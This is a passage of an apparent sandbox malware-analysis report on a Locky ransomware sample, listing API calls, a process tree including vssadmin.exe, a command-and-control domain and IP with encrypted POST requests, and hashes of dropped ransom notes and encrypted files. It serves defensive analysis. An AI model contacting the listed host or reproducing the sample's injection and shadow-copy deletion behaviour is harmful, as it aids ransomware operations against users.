"NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,160", "api": "ZwMapViewOfSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,160", "api": "ZwMapViewOfSection"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,160", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,160", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrLoadDll"}, {"category": "threading", "timestamp": "2016-02-16 17:42:08,170", "api": "CreateRemoteThread"}, {"category": "threading", "timestamp": "2016-02-16 17:42:08,170", "api": "NtResumeThread"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,170", "api": "NtDelayExecution"}, {"category": "threading", "timestamp": "2016-02-16 17:42:08,170", "api": "CreateRemoteThread"}, {"category": "threading", "timestamp": "2016-02-16 17:42:08,170", "api": "NtResumeThread"}, {"category": "windows", "timestamp": "2016-02-16 17:42:08,170", "api": "FindWindowA"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,180", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,180", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,180", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,180", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,180", "api": "NtReadFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,210", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,210", "api": "ZwMapViewOfSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,220", "api": "ZwMapViewOfSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,220", "api": "ZwMapViewOfSection"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,220", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,230", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,230", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,230", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,230", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,230", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,230", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,230", "api": "LdrGetProcedureAddress"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,240", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,250", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,250", "api": "NtFreeVirtualMemory"}, {"category": "misc", "timestamp": "2016-02-16 17:42:11,345", "api": "GetSystemMetrics"}, {"category": "threading", "timestamp": "2016-02-16 17:42:48,258", "api": "ExitThread"}, {"category": "registry", "timestamp": "2016-02-16 17:43:05,753", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:43:05,753", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:43:05,753", "api": "RegCloseKey"}]}, {"parent_id": 1592, "process_name": "cmd.exe", "process_id": 296, "first_seen": "2016-02-16 17:42:07,970", "calls": [{"category": "system", "timestamp": "2016-02-16 17:42:08,130", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,160", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,250", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,250", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,250", "api": "RegOpenKeyExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,250", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,250", "api": "RegOpenKeyExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,250", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegOpenKeyExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,260", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,260", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,260", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,260", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,260", "api": "FindFirstFileExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,260", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,270", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,270", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,270", "api": "NtQueryValueKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,270", "api": "NtQueryValueKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,270", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,270", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,270", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,270", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,270", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,270", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,270", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,310", "api": "DeleteFileW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,310", "api": "NtQueryDirectoryFile"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,310", "api": "LdrGetDllHandle"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,310", "api": "ExitProcess"}]}];
</script>
<hr />

<ul>

<li>
<strong>65fg67n.exe</strong> 1592
<ul>
<li>
<strong>vssadmin.exe</strong> 1840
</li>

<li>
<strong>NOTEPAD.EXE</strong> 592
</li>

<li>
<strong>rundll32.exe</strong> 308
</li>

<li>
<strong>cmd.exe</strong> 296
</li>

</ul>
</li>


</ul>

<script>
function paginationbar(pages, page) {
if (pages === 0) return "";

function alert_current_page (i, page) {
if (i == page) return ' style="background-color: #D9EDF7"';
return '';
}

var out = '';
out += '<li><a'+alert_current_page(1, page)+' href="#">1</a></li>';

if (page-2 > 2) out += '<li><span>...</span></li>';

for (i = Math.max(2, page-2); i <= Math.min(pages-1, page+2); i++) {
out += '<li><a'+alert_current_page(i, page)+' href="#">' + i + '</a></li>';
}

if (page+2 < pages-1) out += '<li><span>...</span></li>';

if (pages > 1)
out += '<li><a'+alert_current_page(pages, page)+' href="#">' + pages + '</a></li>';
return out;
}
function load_chunck(pid, pagenum) {
$("#process_"+pid+" div.calltable").load("/analysis/chunk/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/"+pid+"/"+pagenum+"/", function(data, status, xhr){
if (status == "error") {
$("#process_"+pid+" div.calltable").html("Error loading data. Please reload the page and if the error persists contact us.");
}
else {
$("#process_"+pid+" div.pagination ul").html(paginationbar(parseInt($("#process_"+pid).data('length')), pagenum));
$("#process_"+pid+" div.pagination a").click(function(e) {
var t = $(e.target);
load_chunck(t.parents("#process_"+pid).data('pid'), parseInt(t.text()));
});
}
});
}
</script>

<div class="tabbable">
<ul class="nav nav-tabs">
<li class="active"><a href="#process_1592" data-toggle="tab">65fg67n.exe</a></li>
<li ><a href="#process_1840" data-toggle="tab">vssadmin.exe</a></li>
<li ><a href="#process_592" data-toggle="tab">NOTEPAD.EXE</a></li>
<li ><a href="#process_308" data-toggle="tab">rundll32.exe</a></li>
<li ><a href="#process_296" data-toggle="tab">cmd.exe</a></li>
</ul>
<div class="tab-content">
<div class="tab-pane active" id="process_1592" data-pid="1592" data-length="299">
<div class="alert alert-info" style="text-align: center;"><b>65fg67n.exe</b>, PID: <b>1592</b>, Parent PID: 1796</div>
<div class="pagination pagination-centered"><ul></ul></div>

<p style="text-align: center;">
<span class="badge network" style="color: black;">network</span>
<span class="badge filesystem" style="color: black;">filesystem</span>
<span class="badge registry" style="color: black;">registry</span>
<span class="badge process" style="color: black;">process</span>
<span class="badge services" style="color: black;">services</span>
<span class="badge synchronization" style="color: black;">synchronization</span>
</p>

<div class="calltable"></div>

<div class="pagination pagination-centered pagination_1592"><ul></ul></div>

<script>
load_chunck(1592, 1);
</script>
</div>
<div class="tab-pane" id="process_1840" data-pid="1840" data-length="1">
<div class="alert alert-info" style="text-align: center;"><b>vssadmin.exe</b>, PID: <b>1840</b>, Parent PID: 1592</div>
<div class="pagination pagination-centered"><ul></ul></div>

<p style="text-align: center;">
<span class="badge network" style="color: black;">network</span>
<span class="badge filesystem" style="color: black;">filesystem</span>
<span class="badge registry" style="color: black;">registry</span>
<span class="badge process" style="color: black;">process</span>
<span class="badge services" style="color: black;">services</span>
<span class="badge synchronization" style="color: black;">synchronization</span>
</p>

<div class="calltable"></div>

<div class="pagination pagination-centered pagination_1840"><ul></ul></div>

<script>
load_chunck(1840, 1);
</script>
</div>
<div class="tab-pane" id="process_592" data-pid="592" data-length="4">
<div class="alert alert-info" style="text-align: center;"><b>NOTEPAD.EXE</b>, PID: <b>592</b>, Parent PID: 1592</div>
<div class="pagination pagination-centered"><ul></ul></div>

<p style="text-align: center;">
<span class="badge network" style="color: black;">network</span>
<span class="badge filesystem" style="color: black;">filesystem</span>
<span class="badge registry" style="color: black;">registry</span>
<span class="badge process" style="color: black;">process</span>
<span class="badge services" style="color: black;">services</span>
<span class="badge synchronization" style="color: black;">synchronization</span>
</p>

<div class="calltable"></div>

<div class="pagination pagination-centered pagination_592"><ul></ul></div>

<script>
load_chunck(592, 1);
</script>
</div>
<div class="tab-pane" id="process_308" data-pid="308" data-length="8">
<div class="alert alert-info" style="text-align: center;"><b>rundll32.exe</b>, PID: <b>308</b>, Parent PID: 1592</div>
<div class="pagination pagination-centered"><ul></ul></div>

<p style="text-align: center;">
<span class="badge network" style="color: black;">network</span>
<span class="badge filesystem" style="color: black;">filesystem</span>
<span class="badge registry" style="color: black;">registry</span>
<span class="badge process" style="color: black;">process</span>
<span class="badge services" style="color: black;">services</span>
<span class="badge synchronization" style="color: black;">synchronization</span>
</p>

<div class="calltable"></div>

<div class="pagination pagination-centered pagination_308"><ul></ul></div>

<script>
load_chunck(308, 1);
</script>
</div>
<div class="tab-pane" id="process_296" data-pid="296" data-length="1">
<div class="alert alert-info" style="text-align: center;"><b>cmd.exe</b>, PID: <b>296</b>, Parent PID: 1592</div>
<div class="pagination pagination-centered"><ul></ul></div>

<p style="text-align: center;">
<span class="badge network" style="color: black;">network</span>
<span class="badge filesystem" style="color: black;">filesystem</span>
<span class="badge registry" style="color: black;">registry</span>
<span class="badge process" style="color: black;">process</span>
<span class="badge services" style="color: black;">services</span>
<span class="badge synchronization" style="color: black;">synchronization</span>
</p>

<div class="calltable"></div>

<div class="pagination pagination-centered pagination_296"><ul></ul></div>

<script>
load_chunck(296, 1);
</script>
</div>
</div>
</div>

</div>
<div class="tab-pane fade" id="network">



<div class="tabbable tabs">
<ul class="nav nav-pills" style="margin-bottom: 0;">
<li class="active"><a href="#network_domains_tab" data-toggle="tab">Domains (1)</a></li>
<li><a href="#network_hosts_tab" data-toggle="tab">Hosts (1)</a></li>
<li><a href="#network_http_tab" data-toggle="tab">HTTP (3)</a></li>
<li><a href="#network_irc_tab" data-toggle="tab">IRC (0)</a></li>
<li><a href="#network_smtp_tab" data-toggle="tab">SMTP (0)</a></li>
</ul>
<div class="tab-content">
<div class="tab-pane fade in active" id="network_domains_tab">
<section id="domains">
<h4>Domains</h4>
<table class="table table-striped table-bordered">
<tr>
<th>Domain</th>
<th>IP</th>
</tr>
<tr>
<td>dkoipg.pw</td>
<td>85.25.149.246</td>
</tr>
</table>
</section>

</div>
<div class="tab-pane fade" id="network_hosts_tab">
<section id="hosts">
<h4>Hosts</h4>
<table class="table table-striped table-bordered">
<tr>
<th>IP</th>
</tr>
<tr>
<td>85.25.149.246</td>
</tr>
</table>
</section>

</div>
<div class="tab-pane fade" id="network_http_tab">
<h4>HTTP Requests</h4>

<table class="table table-striped table-bordered" style="table-layout: fixed;">
<tr>
<th>URI</th>
<th>Data</th>
</tr>
<tr>
<td style="word-wrap: break-word;">http://dkoipg.pw/main.php</td>
<td style="word-wrap: break-word;"><pre>POST /main.php HTTP/1.1
Host: dkoipg.pw
Content-Length: 95
Connection: Keep-Alive
Cache-Control: no-cache
\xbf\x9f\x0e\xa1\xf5t\xe5\xbasCP\xd7/\xcb\x81\x8e^\x84\xc6\xd4\xef\x11\xd1\x93\xf8\x90h\xf6\xc1\x82\xefOY~\x17*\xc5\xda\x80\x84H:\x8d\xf9\x1e+=\x1c\xa1\xf9~Y\x13\x13\x9a\x90U\x8d\x99\x14aG\xa3\xd2\xd2\x98o\x16\xba\xed\xc9\xfe\xee\xdd\x8d\x8e\xfa\xc9\x01e&amp;;\xca.{\xd4\xa8\xa7\x11R\x0b\xb4\xd9z_</pre></td>
</tr>
<tr>
<td style="word-wrap: break-word;">http://dkoipg.pw/main.php</td>
<td style="word-wrap: break-word;"><pre>POST /main.php HTTP/1.1
Host: dkoipg.pw
Content-Length: 101
Connection: Keep-Alive
Cache-Control: no-cache
v\x8a\x9eF\xb3h4B(.%\x1c\xe6V\x0b)\xec\xddj\x82\xc4\x84\x9b6*y\x9c\x8c\xfb\x9f\xe0\xcb\x98\x91\xeaK\x8a~Nc/\xc2\xdc\xa4i\xc43\xb0\xe5\\xff\xb4\xfei@\x84\xfeZv.\xc7\x04X\x87\xf7\xc6\x9a\xa5\xc0\x8dC@?\xbb\xf0\xad\xc3\xa6\xdc1:$\xc3)b\xcafz\x9b\xca`K\xc7]\xc8\x03\x802:\xabA</pre></td>
</tr>
<tr>
<td style="word-wrap: break-word;">http://dkoipg.pw/main.php</td>
<td style="word-wrap: break-word;"><pre>POST /main.php HTTP/1.1
Host: dkoipg.pw
Content-Length: 55
Connection: Keep-Alive
Cache-Control: no-cache
\xb7\x8e\x92\xf0\xc8\xf1\xf3[7\xa9\xbc\xc4M&gt;\xf0\x13\xad\xfdz
\x00\xe6\xaa.&amp;\xff_m\x8b&#39;\xbce\xca\xc8&gt;\xb1\x1f72\xed\xd0 {\xe8\x00q\xbb\x1a\x19\xa0\x85\x89\xe10\x0f</pre></td>
</tr>
</table>

</div>
<div class="tab-pane fade" id="network_irc_tab">
<h4>IRC Traffic</h4>

No IRC traffic.

</div>
<div class="tab-pane fade" id="network_smtp_tab">
<h4>SMTP Requests</h4>

<p>No SMTP requests performed.</p>

</div>
</div>
</div>
</div>
<div class="tab-pane fade" id="dropped">
<div class="box">
<div class="box-content" style="padding: 0">
<table class="table table-striped">
<tr>
<th style="border-top: 0;">File name</th>
<td style="border-top: 0;"><b>_Locky_recover_instructions.txt</b></td>
</tr>
<tr>
<th>File Size</th>
<td>1133 bytes</th>
</tr>
<tr>
<th>File Type</th>
<td>UTF-8 Unicode (with BOM) text, with CRLF line terminators</th>
</tr>
<tr>
<th>MD5</th>
<td>28872fdc8ad0befded55c1fa8e1454a7</th>
</tr>
<tr>
<th>SHA1</th>
<td>a36b30262f3b63857387333a787a471fb9a0a926</th>
</tr>
<tr>
<th>SHA256</th>
<td>d18bc419150f0652ea5d187e872f01d35e5d5f5537881e1a877e935a492ae090</th>
</tr>
<tr>
<th>CRC32</th>
<td>4F1898E2</th>
</tr>
<tr>
<th>Ssdeep</th>
<td>24:IYiujOdZUZa2MFRqyU8JmFFiHTxlUfQCCmwZq8c8l:kuSrI9rt0YfQxZ6q</th>
</tr>
<tr>
<th>Yara</th>
<td>
None matched
</td>
</tr>
</table>
</div>
</div>
<div class="box">
<div class="box-content" style="padding: 0">
<table class="table table-striped">
<tr>
<th style="border-top: 0;">File name</th>
<td style="border-top: 0;"><b>_Locky_recover_instructions.bmp</b></td>
</tr>
<tr>
<th>File Size</th>
<td>3151210 bytes</th>
</tr>
<tr>
<th>File Type</th>
<td>PC bitmap, Windows 3.x format, 1229 x 641 x 32</th>
</tr>
<tr>
<th>MD5</th>
<td>4a1af0e5f6f033d4273cf7137f021ae5</th>
</tr>
<tr>
<th>SHA1</th>
<td>64cc4f1964ea3667d28bc681df8864d4cd20ac31</th>
</tr>
<tr>
<th>SHA256</th>
<td>4a2f58022ac8f907daca570af6b8e2f6381b468c6b9927f40270ab546a0352a9</th>
</tr>
<tr>
<th>CRC32</th>
<td>AF4CD464</th>
</tr>
<tr>
<th>Ssdeep</th>
<td>384:e1XYA3KhasjuuUnLLFm5IVEUYl8Oi13F19PaFQI+ZugYMTpElWl2RRqq5maS8vVk:2</th>
</tr>
<tr>
<th>Yara</th>
<td>
None matched
</td>
</tr>
</table>
</div>
</div>
<div class="box">
<div class="box-content" style="padding: 0">
<table class="table table-striped">
<tr>
<th style="border-top: 0;">File name</th>
<td style="border-top: 0;"><b>27F18F41A6BDB525437D5356700D902C.locky</b></td>
</tr>
<tr>
<th>File Size</th>
<td>836 bytes</th>
</tr>
<tr>
<th>File Type</th>
<td>data</th>
</tr>
<tr>
<th>MD5</th>
<td>0a8a5a4d601e590de67ddff3a4ca97a4</th>
</tr>
<tr>
<th>SHA1</th>
<td>5f2f36f7532043b64d42bc5ef520f92f865459ce</th>
</tr>
<tr>
<th>SHA256</th>
<td>828100274f6a466f317dc570ea3c4c241c4783ea758991342af84eace7a4fd3b</th>
</tr>
<tr>
<th>CRC32</th>
<td>0BA9B0B9</th>
</tr>
<tr>
<th>Ssdeep</th>
<td>12:vGEcSqGAZ33ktStcnZmP/R/DAyvWC4HDYSYmFnZ7QKCYeto6+4PiNONvu4aZ52tO:vGAqGAZ3xGZL3HseHQYe1P1u4a6FLQ</th>
</tr>
<tr>
<th>Yara</th>
<td>
None matched
</td>
</tr>
</table>
</div>
</div>
<div class="box">
<div class="box-content" style="padding: 0">
<table class="table table-striped">
<tr>
<th style="border-top: 0;">File name</th>
<td style="border-top: 0;"><b>65fg67n.exe</b></td>
</tr>
<tr>
<th>File Size</th>
<td>208896 bytes</th>
</tr>
<tr>
<th>File Type</th>
<td>PE32 executable (GUI) Intel 80386, for MS Windows</th>
</tr>
<tr>
<th>MD5</th>
<td>e1a9b6f7285a85e682ebcad028472d13</th>
</tr>
<tr>
<th>SHA1</th>
<td>1347b810ac90c13154908f7cf45b11913c182e44</th>
</tr>
<tr>
<th>SHA256</th>
<td>5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8</th>
</tr>
<tr>
<th>CRC32</th>
<td>E4BE5457</th>
</tr>
<tr>
<th>Ssdeep</th>
<td>3072:esOe84dmDsobhW7CfhQ7J37HBWTH6sDq2bEGKPe59jLi7TuKmx5wxv+18:jr84+sqhkCepzBW3bNV5408</th>
</tr>
<tr>
<th>Yara</th>
<td>
None matched
</td>
</tr>
</table>
</div>
</div>

</div>
<div class="tab-pane fade" id="comments">
<div class="alert alert-info"><b>Bummer!</b> No comments yet.</div>


<hr />


<p>You have to login to comment.</p>

</div>
</div>
</div>


</div>
<!-- Footer
================================================== -->
<footer>
<div class="container-fluid center">
<a href="#">Back to the top</a>
</div>
</footer>
<div id="footer-extra">
<div class="container-fluid center">
<div>The content of this website is released under Creative Commons <a href="http://creativecommons.org/licenses/by-nc-sa/3.0/">CC BY-NC-SA 3.0</a> license</div>
<div>with love, <a href="http://twitter.com/botherder"><i>nex</i></a> &amp; <a href="http://twitter.com/jekil"><i>jekil</i></a></div>
<div style="margin-top: 10px;"><a href="http://www.shadowserver.org"><img src="/static/graphic/shadowserver.png" alt="Shadowserver" border="0" /></a></div>
</div>
</div>
<script src="/static/js/bootstrap.min.js"></script>
<script src="/static/js/bootstrap-fileupload.js"></script>
<script src="/static/js/graph/highcharts-2.3.2.js"></script>
<script src="/static/js/graph/graph-0.8.js"></script>
<script src="/static/js/lightbox.js"></script>
<script src="/static/js/jquery.tagcloud.js"></script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-30121810-1']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>
</body>
</html>